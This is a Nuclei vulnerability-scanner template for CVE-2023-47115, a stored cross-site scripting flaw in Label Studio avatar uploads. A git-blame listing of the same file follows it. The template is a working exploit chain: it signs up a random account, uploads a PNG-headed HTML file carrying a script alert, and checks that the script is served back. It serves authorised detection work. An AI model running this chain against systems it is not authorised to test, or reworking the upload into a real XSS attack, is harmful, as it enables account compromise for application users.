nuclei-templates/http/cves/2023/CVE-2023-47115.yaml

id: CVE-2023-47115

info:
  name: Label Studio - Cross-Site Scripting
  author: isacaya
  severity: high
  description: |
    Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
  impact: |
    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
  remediation: |
    Update to version 1.9.2.
  reference:
    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
    - https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49
    - https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2023-47115
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 6
    shodan-query: http.favicon.hash:-1649949475
  tags: cve,cve2023,xss,authenticated,intrusive,label-studio

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /user/signup/?&next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false

      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /api/users/{{id}}/avatar/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF

        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
        Content-Type: image/png

        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF

      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}

      - |
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: csrftoken
        internal: true
        attribute: value
        xpath:
          - '/html/body/div/form/input'

      - type: json
        part: body
        name: id
        internal: true
        json:
          - '.id'

      - type: json
        part: body
        name: filename
        internal: true
        json:
          - '.avatar'

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains(header, 'text/html')"
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`id: CVE-2023-47115`

			`info:`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00			`name: Label Studio - Cross-Site Scripting`
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`author: isacaya`
			`severity: high`
fix-formatting 2024-01-30 07:55:56 +00:00			`description: \|`
			`Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.`
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`impact: \|`
			`Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.`
			`remediation: \|`
			`Update to version 1.9.2.`
			`reference:`
			`- https://github.com/advisories/GHSA-q68h-xwq5-mm7x`
fix-formatting 2024-01-30 07:55:56 +00:00			`- https://docs.djangoproject.com/en/4.2/ref/views/#serving-files-in-development`
			`- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/functions.py#L18-L49`
			`- https://github.com/HumanSignal/label-studio/blob/1.8.2/label_studio/users/urls.py#L25-L26`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-47115`
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L`
			`cvss-score: 7.1`
			`cve-id: CVE-2023-47115`
			`cwe-id: CWE-79`
fix-formatting 2024-01-30 07:55:56 +00:00			`metadata:`
			`verified: true`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`max-request: 6`
fix-formatting 2024-01-30 07:55:56 +00:00			`shodan-query: http.favicon.hash:-1649949475`
			`tags: cve,cve2023,xss,authenticated,intrusive,label-studio`
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00
			`http:`
			`- raw:`
			`- \|`
			`GET /user/login/ HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- \|`
			`POST /user/signup/?&next=/projects/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- \|`
			`GET /api/current-user/whoami HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- \|`
			`POST /api/users/{{id}}/avatar/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF`

			`------WebKitFormBoundarytZZRQ9D2LS0PMsHF`
			`Content-Disposition: form-data; name="avatar"; filename="nuclei.html"`
			`Content-Type: image/png`

			`{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}`
			`------WebKitFormBoundarytZZRQ9D2LS0PMsHF`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- \|`
			`GET /api/current-user/whoami HTTP/1.1`
			`Host: {{Hostname}}`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- \|`
			`GET {{filename}} HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: xpath`
			`name: csrftoken`
			`internal: true`
			`attribute: value`
			`xpath:`
			`- '/html/body/div/form/input'`
fix-formatting 2024-01-30 07:55:56 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- type: json`
			`part: body`
			`name: id`
			`internal: true`
			`json:`
			`- '.id'`
fix-formatting 2024-01-30 07:55:56 +00:00
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- type: json`
			`part: body`
			`name: filename`
			`internal: true`
			`json:`
			`- '.avatar'`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "status_code == 200"`
Update CVE-2023-47115.yaml 2024-01-30 17:06:51 +00:00			`- "contains(header, 'text/html')"`
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`- 'contains(body, "<script>alert(document.domain)</script>")'`
fix-formatting 2024-01-30 07:55:56 +00:00			`condition: and`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 4a0a00473045022100aa945f4d7cfc24ccc7b7a8f60b7f6330657b9143527d8c1a0d1c30afb5798fd80220611e10519bf2fd4257bf6911993b35e94fcacb89b616f16f50b98606dda06dac:922c64590222798bb761d5b6d8e72950`